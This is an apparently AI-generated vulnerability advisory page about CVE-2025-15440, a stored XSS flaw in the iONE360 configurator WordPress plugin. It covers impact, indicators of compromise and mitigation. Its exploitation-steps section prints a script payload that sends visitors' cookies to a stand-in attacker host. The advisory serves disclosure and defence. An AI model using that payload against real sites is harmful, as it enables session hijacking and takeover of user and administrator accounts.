AI for Security Summit: Join Figma, Perplexity & Wiz. [Register]

CVE-2025-15440
WordPress vulnerability analysis and mitigation

Overview

CVE-2025-15440 is a Stored Cross-Site Scripting (XSS) vulnerability in the iONE360 configurator plugin for WordPress, affecting all versions up to and including 2.0.57. The flaw exists due to insufficient input sanitization and output escaping in the Contact Form Parameters, allowing unauthenticated attackers to inject arbitrary web scripts into pages that execute when any user visits the affected page. It was published on February 11, 2026, and carries a CVSS v3.1 base score of 7.2 (High) (Red Hat CVE, Wordfence).

Technical details

The root cause is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting), stemming from the plugin's failure to properly sanitize user-supplied input in Contact Form Parameters before storing and rendering it in web pages. Because no authentication is required and the scope is changed (affecting users beyond the attacker's session), an attacker can submit a crafted payload through the contact form that is persistently stored and later executed in victims' browsers. No specific PoC code has been publicly referenced, but the attack vector is network-accessible with low complexity and no privileges required (Red Hat CVE, Infinit Security).

Impact

Successful exploitation allows attackers to execute malicious JavaScript in the browsers of any user who visits an injected page, impacting both confidentiality (e.g., session cookie theft, credential harvesting) and integrity (e.g., page content manipulation, phishing redirects). Because the vulnerability is unauthenticated and stored, a single exploit submission can affect all subsequent visitors to the compromised page, including administrators, potentially enabling privilege escalation or site takeover. Availability is not directly impacted (Red Hat CVE, Wordfence).

Exploitability

As of the time of disclosure, no patch was available for this vulnerability, leaving all installations of iONE360 configurator at version 2.0.57 and below exposed. The EPSS score is approximately 0.215%, indicating a relatively low but non-negligible probability of exploitation in the near term. No in-the-wild exploitation, threat actor attribution, or CISA KEV catalog listing has been reported (Red Hat CVE, Wordfence).

Exploitation steps

  1. Reconnaissance: Identify WordPress sites using the iONE360 configurator plugin (version ≤ 2.0.57) by searching for plugin-specific fingerprints in page source or using tools like WPScan.
  2. Locate the Contact Form: Navigate to the page on the target WordPress site that renders the iONE360 contact form, which accepts user-supplied parameters.
  3. Craft a malicious payload: Prepare a stored XSS payload, such as <script>document.location='https://attacker.com/steal?c='+document.cookie</script>, to be injected into a vulnerable Contact Form Parameter field.
  4. Submit the payload: Submit the contact form with the malicious script in the vulnerable parameter. Due to insufficient sanitization, the payload is stored in the database without being neutralized.
  5. Trigger execution: When any user (including administrators) visits the page containing the injected content, the malicious script executes in their browser, enabling session hijacking, credential theft, or further attacks (Infinit Security, Red Hat CVE).

Indicators of compromise

  • Network: Outbound requests from victim browsers to unknown external domains shortly after visiting pages with the iONE360 contact form; unusual POST requests to the contact form endpoint containing HTML/JavaScript tags in parameter values.
  • Logs: WordPress access logs showing POST requests to the iONE360 contact form endpoint with encoded or raw script tags (<script>, javascript:, onerror=, etc.) in parameter fields.
  • File System / Database: WordPress database entries in form submission tables containing unsanitized JavaScript or HTML script tags in Contact Form Parameter fields.
  • Browser/User Reports: Users reporting unexpected redirects, pop-ups, or session anomalies after visiting pages that include the iONE360 configurator contact form (Infinit Security).

Mitigation and workarounds

At the time of disclosure, no patched version of the iONE360 configurator plugin was available, and all versions up to and including 2.0.57 are affected. Site administrators should consider disabling or removing the plugin until a fix is released by the vendor. As a compensating control, deploying a Web Application Firewall (WAF) with XSS filtering rules (e.g., Wordfence, Cloudflare WAF) can help block malicious payloads from being submitted. Monitor the plugin's WordPress repository page for an updated release and apply it immediately upon availability (Wordfence, Red Hat CVE).

Community reactions

Wordfence included CVE-2025-15440 in its weekly WordPress vulnerability report for February 9–15, 2026, highlighting it as an unauthenticated stored XSS issue with no available patch at the time of reporting (Wordfence). Security aggregators such as VulDB, Vulners, and Red Packet Security also picked up the disclosure, indicating standard community awareness without notable controversy or significant social media discussion (Red Packet Security).

Additional resources


SourceThis report was generated using AI

Related WordPress vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-14805HIGH8.8
  • consulting
NoYesSep 15, 2026
CVE-2026-75983HIGH7.5
  • wp-event-solution
NoYesSep 15, 2026
CVE-2026-90650HIGH7.2
  • motopress-hotel-booking-lite
NoYesSep 15, 2026
CVE-2026-89141MEDIUM6.5
  • ai-engine
NoYesSep 15, 2026
CVE-2026-15609MEDIUM6.4
  • bridge
NoYesSep 15, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management